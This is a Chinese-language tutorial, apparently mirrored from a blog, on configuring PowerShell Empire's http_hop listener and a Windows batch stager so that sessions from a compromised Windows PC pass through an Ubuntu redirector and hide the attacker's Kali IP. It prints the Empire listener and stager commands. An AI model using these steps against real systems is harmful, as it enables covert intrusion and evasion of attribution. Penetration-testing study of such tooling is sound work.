zoukankan
html css js c++ java
使用PowerShell Empire(http_hop)隐藏IP
在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。
与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。
在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。
在下图中,您也可以看到我们的ubuntu的IP
。
现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:
uselistener http
execute
现在,输入以下命令启动http_hop侦听器:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。
执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:
现在,您可以在下图中看到我们激活了两个侦听器:
让我们通过键入以下命令来启动stager
:
usestager windows/launcher_bat
set Listener http_hop
execute
在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。
总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。
查看全文
相关阅读:
LinqToXML~读XML文件
C#~使用FileSystemWatcher来监视文件系统的变化
HDU4144:Bacon's Cipher
国产手机的路还很长
同一个存储过程中,不能多次select into 到同一张表的问题
IT行业为什么没有进度
IOT(Index Organized Table)
模版——容器,迭代器
shell split分析日志文件
VMware vSphere 服务器虚拟化之十七 桌面虚拟化之安装View链接服务器
原文地址:https://www.cnblogs.com/sup3rman/p/13725093.html
最新文章
瑞士表降关税售价相差无几 名表迷直言不够给力-浙商网-浙江在线
SOLOWHEEL
明星+大制作+生硬广告植入 观众看《富春山居图》-评论频道-金融界
英雄联盟被美认可为体育运动 职业玩家可获绿卡-搜狐新闻
birdnest是什么意思_birdnest在线翻译_英语_读音_用法_例句_海词词典
没钱的时候和有钱的时候(精辟)_导游天地_同程大学
有时间的时候没钱,有钱的时候没时间_天使Emily_一起游博客_一起游_17u.com
为什么有钱了没时间,没钱时有时间。-爱问搜索
有钱就没时间,有时间就没钱。男人你选哪个?
曾良
热门文章
曾良
Fashion Meets Finance聚会来袭-7月19日 北京
- Tendence
北京青年是背景青年 “这是个高富帅装屌丝的游戏”-读书频道-金融界
金融界高富帥現身快男北京唱區 陳樂:我拿生活養夢想__娛樂新聞_Yes娛樂
30岁生日,媳妇赏的,U-BOAT手表一枚-数字尾巴
英格兰属于英国吗?
新做了一个项目,一个人做的,关于数据传输的项目(架构说明)
基础才是重中之重~C#中标准的IDispose模式
LinqToXML~读XML文件续
Copyright © 2011-2022 走看看